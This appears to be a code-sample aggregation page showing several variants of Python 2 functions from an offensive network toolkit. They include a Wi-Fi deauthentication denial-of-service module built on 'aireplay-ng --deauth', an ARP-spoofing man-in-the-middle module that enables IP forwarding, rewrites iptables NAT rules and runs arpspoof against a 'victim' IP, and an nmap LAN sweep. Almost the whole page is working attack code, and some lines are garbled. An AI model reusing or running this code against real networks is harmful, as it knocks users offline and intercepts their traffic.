Exemplo n.º 1
0
def ddos(run):
	global defaultcar,defaultint,defaultmac,defaultcha,defaultess
	try:
		if run!=1:
			actions=raw_input(d.prompt("wifi/dos"))
		else:
			actions="run"
		if actions == "show options" or actions == "sop":
			d.option()
			d.descrip("intf","yes","Interface card",defaultcar)
			d.descrip("intm","yes","Int... monitor",defaultint)
			d.descrip("bssid","yes","Mac address",defaultmac)
			d.descrip("essid","yes","Name of AP",defaultess)
			d.descrip("chan","yes","Channel red",defaultcha)
			d.helpAUX()
			ping.interfaces(1)
			ping.monitor()
			d.space()
		elif actions[0:8] == "set intf":
			defaultcar=ping.update(defaultcar,actions,"intf")
			d.change("intf",defaultcar)
		elif actions[0:8] == "set intm":
			defaultint=ping.update(defaultint,actions,"intm")
			d.change("intm",defaultint)
		elif actions[0:9] == "set bssid":
			defaultmac=ping.update(defaultmac,actions,"bssid")
			d.change("bssid",defaultmac)
		elif actions[0:9] == "set essid":
			defaultess=ping.update(defaultess,actions,"essid")
			d.change("essid",defaultess)
		elif actions[0:8] == "set chan":
			defaultcha=ping.update(defaultcha,actions,"chan")
			d.change("chan",defaultcha)
		elif actions[0:5] == "start":
			start = actions[6:]
			print " "+Alr+" Starting Monitor Mode In "+start,ping.status_cmd("airmon-ng start "+start,"\t\t\t")
		elif actions=="exit" or actions=="x":
			d.goodbye()
			exit()
		elif actions=="help" or actions=="h":
			help.help()
		elif actions=="back" or actions=="b":
			return
		elif actions=="run"  or actions=="r":
			d.run()
			try:
				print " "+Alr+" Starting attack..."
				subprocess.call('aireplay-ng --deauth 1000 -a '+defaultmac+' '+defaultint, shell=True)
			except(KeyboardInterrupt, SystemExit):
				print("\n "+Alr+" Stopped DDOS")
		else:
			d.nocommand()
	except:
		d.kbi()
		exit()
	ddos(0)
Exemplo n.º 2
0
def iandi():
	d.run()
	d.space()
	print " IP Local   : ",ping.myip()
        ping.interfaces(1)
        ping.get_gateway(1)
        ping.my_mac_address(1)	
	ping.get_external_ip()
	print " Username   : "******" OS         : ",commands.getoutput('uname')
	print " Version    : ",commands.getoutput('uname -r')
	return 1
Exemplo n.º 3
0
def ddos(run):
    global defaultint, defaultmac
    try:
        if run != 1:
            actions = raw_input(d.prompt("wifi/dos"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("device", "yes", "Interface", defaultint)
            d.descrip("bssid", "yes", "Mac Target", defaultmac)
            d.helpAUX()
            ping.interfaces(1)
            ping.monitor()
            d.space()
        elif actions[0:10] == "set device":
            defaultint = ping.update(defaultint, actions, "device")
            d.change("device", defaultint)
            ddos(0)
        elif actions[0:9] == "set bssid":
            defaultmac = ping.update(defaultmac, actions, "bssid")
            d.change("bssid", defaultmac)
        elif actions[0:5] == "start":
            start = actions[6:]
            print " " + Alr + " Starting Monitor Mode In " + start, ping.status_cmd(
                "sudo airmon-ng start " + start, "\t\t\t")
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                if ping.checkDevice(defaultint):
                    print " " + Alr + " Starting attack to " + defaultmac
                    subprocess.call('aireplay-ng --deauth 100000 -a ' +
                                    defaultmac + ' ' + defaultint,
                                    shell=True)
                    stopAttack = raw_input(
                        ' ' + Hlp + ' Press Any Key for Stop the Attack.')
                    subprocess.call("killall aireplay-ng", shell=True)
                else:
                    d.NoDeviceFound(defaultint)
            except:
                Errors.Errors(event=sys.exc_info(), info=3)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info(), info=1)
    ddos(0)
Exemplo n.º 4
0
def iandi():
    d.run()
    d.space()
    print " IP Local   : ", ping.myip()
    ping.interfaces(1)
    ping.get_gateway(1)
    ping.my_mac_address(1)
    ping.get_external_ip()
    print " Username   : "******" OS         : ", commands.getoutput('uname')
    print " Version    : ", commands.getoutput('uname -r')
    return 1
Exemplo n.º 5
0
def ddos(run):
	global defaultint,defaultmac,defaulchan
	try:
		if run!=1:
			actions=raw_input(d.prompt("wifi/dos"))
		else:
			actions="run"
		if actions == "show options" or actions == "sop":
			d.option()
			d.descrip("device","yes","Interface",defaultint)
			d.descrip("bssid","yes","Mac Target",defaultmac)
			d.descrip("chann","yes","Channel ap",defaultmac)
			d.helpAUX()
			ping.interfaces(1)
			ping.monitor()
			d.space()
		elif actions[0:10] == "set device":
			defaultint=ping.update(defaultint,actions,"device")
			d.change("device",defaultint)
			ddos(0)
		elif actions[0:9] == "set bssid":
			defaultmac=ping.update(defaultmac,actions,"bssid")
			d.change("bssid",defaultmac)
		elif actions[0:5] == "start":
			start = actions[6:]
			print " "+Alr+" Starting Monitor Mode In "+start,ping.status_cmd("sudo airmon-ng start "+start,"\t\t\t")
		elif actions=="exit" or actions=="x":
			d.goodbye()
			exit()
		elif actions=="help" or actions=="h":
			help.help()
		elif actions=="back" or actions=="b":
			return
		elif actions=="run"  or actions=="r":
			d.run()
			try:
				if ping.checkDevice(defaultint):
					print " "+Alr+" Starting attack to "+defaultmac
					ping.Subprocess('aireplay-ng --deauth 100000 -a '+defaultmac+' '+defaultint)
					NULL=raw_input(" "+Hlp+" for Stop DOS Attack (PRESS ANY KEY)")
					subprocess.call("killall aireplay-ng", shell=True)
				else:
					d.NoDeviceFound(defaultint)
			except:
				Errors.Errors(event=sys.exc_info(), info=3)
		else:
			d.No_actions()
	except:
		Errors.Errors(event=sys.exc_info(), info=1)
	ddos(0)
Exemplo n.º 6
0
def arpp(run): 
    try:
        global defaultgat,defaultipv,defaultint
        if run!=1:
            actions=raw_input(d.prompt("net/arpspoof"))
        else:
            actions="run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target","yes","IP victim",defaultipv)
            d.descrip("gway","yes","Gateway-Router.",defaultgat)
            d.descrip("iterce","yes","Interface",defaultint)
            d.helpAUX()
            if ping.conneted()!=False:
                ping.interfaces(1)
                ping.get_gateway(1)
                ping.my_mac_address(1)
                d.space()
                if ping.conneted()!=False:
                    commands.getoutput(NMAP_PATH+' -sn '+str(ping.myip())+'/24 -oX tmp/ips.xml > null')
                    GateWay=ping.get_gateway(2)
                    tree = ET.parse('tmp/ips.xml')
                    root = tree.getroot()
                    IPf=0
                    counter=0
                    IP=""
                    for host in root.findall('host'):
                        for hosted in host.findall('address'):
                            if hosted.get('addrtype') == "ipv4":
                                IPf=hosted.get('addr')
                            else:
                                if GateWay == IPf :
                                    IPf=colors[8]+colors[4]+"{GW:"+IPf+"}"+colors[0]
                                IPs.append(" "+IPf+" "+str(hosted.get('addr'))+" "+str(hosted.get('vendor')))
                    print " "+colors[10]+colors[7]+" # \t IP \t\t MAC \t\t VENDOR         "+colors[0]

                    for HOST in IPs:
                        counter=counter+1               
                        print " ["+str(counter)+"]"+HOST
                    d.space()
                    commands.getoutput('rm tmp/ips.xml > null')
            else:
                print d.noconnect()
            print ""
            arpp(0)
        elif actions[0:10] == "set target":
            defaultipv=ping.update(defaultipv,actions,"target")
            d.change("target",defaultipv)
        elif actions[0:8] == "set gway":
            defaultgat=ping.update(defaultgat,actions,"gway")
            d.change("gway",defaultgat)
        elif actions[0:10] == "set iterce":
            defaultint=ping.update(defaultint,actions,"iterce")
            d.change("iterce",defaultint)
        elif actions=="exit" or actions=="x":
            d.goodbye()
            exit()
        elif actions=="help" or actions=="h":
            help.help()
        elif actions=="back" or actions=="b":
            return
            return
        elif actions[0:5]=="save:":
            ping.SaveVariable(secuence=actions, matrix=IPs)
        elif actions=="run"  or actions=="r":
            d.run()
            try:
		My_Ip=ping.myip()
		Tables="""
iptables --flush;
iptables --zero;
iptables --delete-chain;
iptables -F -t nat;
iptables --append FORWARD --in-interface """+defaultint+""" --jump ACCEPT;
iptables --table nat --append POSTROUTING --out-interface """+defaultint+""";
"""

                print " "+Alr+" Ensure the victim recieves packets by forwarding them",ping.status_cmd('echo 1 > /proc/sys/net/ipv4/ip_forward','\t')
                print " "+Alr+" Configuring IPtables NAT",ping.status_cmd(Tables,'\t\t\t\t')
                print " "+Alr+" Starting ARP Poisoning..."
                try:
                    z=multiprocessing.Process(target=Get_PoisoningTTG)
                    t=multiprocessing.Process(target=Get_PoisoningTGT)
                    t.start()
                    z.start()
                    NULL=raw_input(" "+Hlp+" Stop Attack ARP (PRESS ANY KEY)")
                    print " "+Alr+" Stopping ARP Poisoning...", ping.status_cmd('killall arpspoof','\t\t\t\t')
                    print " "+Alr+" Setting Normal configuration in forwarding",ping.status_cmd('echo 0 > /proc/sys/net/ipv4/ip_forward','\t\t')
                    t.terminate()
                    z.terminate()  
                    d.space()
                    arpp(0)
                except:
                    Errors.Errors(event=sys.exc_info(), info=False)
            except:
                Errors.Errors(event=sys.exc_info(), info=False)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info(), info=False)
    arpp(0)
Exemplo n.º 7
0
def arpp(run):
    try:
        global defaultgat, defaultipv, defaultint
        if run != 1:
            actions = raw_input(d.prompt("net/arpspoof"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP victim", defaultipv)
            d.descrip("gway", "yes", "Gateway-Router.", defaultgat)
            d.descrip("iterce", "yes", "Interface", defaultint)
            d.helpAUX()
            if ping.conneted() != False:
                ping.interfaces(1)
                ping.get_gateway(1)
                ping.my_mac_address(1)
                d.space()
                if ping.conneted() != False:
                    commands.getoutput(NMAP_PATH + ' -sn ' + str(ping.myip()) +
                                       '/24 -oX tmp/ips.xml > null')
                    GateWay = ping.get_gateway(2)
                    tree = ET.parse('tmp/ips.xml')
                    root = tree.getroot()
                    IPf = 0
                    counter = 0
                    IP = ""
                    for host in root.findall('host'):
                        for hosted in host.findall('address'):
                            if hosted.get('addrtype') == "ipv4":
                                IPf = hosted.get('addr')
                            else:
                                if GateWay == IPf:
                                    IPf = colors[8] + colors[
                                        4] + "{GW:" + IPf + "}" + colors[0]
                                IPs.append(" " + IPf + " " +
                                           str(hosted.get('addr')) + " " +
                                           str(hosted.get('vendor')))
                    print " " + colors[10] + colors[
                        7] + " # \t IP \t\t MAC \t\t VENDOR         " + colors[
                            0]

                    for HOST in IPs:
                        counter = counter + 1
                        print " [" + str(counter) + "]" + HOST
                    d.space()
                    commands.getoutput('rm tmp/ips.xml > null')
            else:
                print d.noconnect()
            print ""
            arpp(0)
        elif actions[0:10] == "set target":
            defaultipv = ping.update(defaultipv, actions, "target")
            d.change("target", defaultipv)
        elif actions[0:8] == "set gway":
            defaultgat = ping.update(defaultgat, actions, "gway")
            d.change("gway", defaultgat)
        elif actions[0:10] == "set iterce":
            defaultint = ping.update(defaultint, actions, "iterce")
            d.change("iterce", defaultint)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
            return
        elif actions[0:5] == "save:":
            ping.SaveVariable(secuence=actions, matrix=IPs)
        elif actions == "run" or actions == "r":
            d.run()
            try:
                My_Ip = ping.myip()
                Tables = """
iptables --flush;
iptables --zero;
iptables --delete-chain;
iptables -F -t nat;
iptables --append FORWARD --in-interface """ + defaultint + """ --jump ACCEPT;
iptables --table nat --append POSTROUTING --out-interface """ + defaultint + """;
"""

                print " " + Alr + " Ensure the victim recieves packets by forwarding them", ping.status_cmd(
                    'echo 1 > /proc/sys/net/ipv4/ip_forward', '\t')
                print " " + Alr + " Configuring IPtables NAT", ping.status_cmd(
                    Tables, '\t\t\t\t')
                print " " + Alr + " Starting ARP Poisoning..."
                try:
                    z = multiprocessing.Process(target=Get_PoisoningTTG)
                    t = multiprocessing.Process(target=Get_PoisoningTGT)
                    t.start()
                    z.start()
                    NULL = raw_input(" " + Hlp +
                                     " Stop Attack ARP (PRESS ANY KEY)")
                    print " " + Alr + " Stopping ARP Poisoning...", ping.status_cmd(
                        'killall arpspoof', '\t\t\t\t')
                    print " " + Alr + " Setting Normal configuration in forwarding", ping.status_cmd(
                        'echo 0 > /proc/sys/net/ipv4/ip_forward', '\t\t')
                    t.terminate()
                    z.terminate()
                    d.space()
                    arpp(0)
                except:
                    Errors.Errors(event=sys.exc_info(), info=False)
            except:
                Errors.Errors(event=sys.exc_info(), info=False)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info(), info=False)
    arpp(0)
Exemplo n.º 8
0
def arpp(run): 
    try:
        global defaultgat,defaultipv,defaultint
        if run!=1:
            actions=raw_input(d.prompt("net/arpspoof"))
        else:
            actions="run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target","yes","IP victim",defaultipv)
            d.descrip("gway","yes","Gateway-Router.",defaultgat)
            d.descrip("inter","yes","Interface",defaultint)
            d.helpAUX()
            if ping.conneted()!=False:
                ping.interfaces(1)
                ping.get_gateway(1)
                ping.my_mac_address(1)
                d.space()
                ping.lan_ips(1)
            else:
                print d.noconnect()
            print ""
            arpp(0)
        elif actions[0:10] == "set target":
            defaultipv = actions[11:]
            d.change("target",defaultipv)
            arpp(0)
        elif actions[0:8] == "set gway":
            defaultgat = actions[9:]
            d.change("gway",defaultgat)
            arpp(0)
        elif actions[0:10] == "set inter":
            defaultint = actions[11:]
            d.change("inter",defaultint)
            arpp(0)
        elif actions=="exit" or actions=="x":
            d.goodbye()
            exit()
        elif actions=="help" or actions=="h":
            help.help()
        elif actions=="back" or actions=="b":
            return
            return
        elif actions=="run"  or actions=="r":
            d.run()
            try:
                print " "+Alr+" Ensure the victim recieves packets by forwarding them",ping.status_cmd('echo 1 > /proc/sys/net/ipv4/ip_forward','\t')
                print " "+Alr+" Starting ARP Poisoning..."
                try:
                    os.system("arpspoof -i "+defaultint+" -t "+defaultipv+" -r "+defaultgat)
                except:
                    print " "+Alr+" Stopping ARP Poisoning..."
                    print " "+Alr+" forwarding in 0",ping.status_cmd('echo 0 > /proc/sys/net/ipv4/ip_forward','\t\t\t')
                    Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=False)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    arpp(0)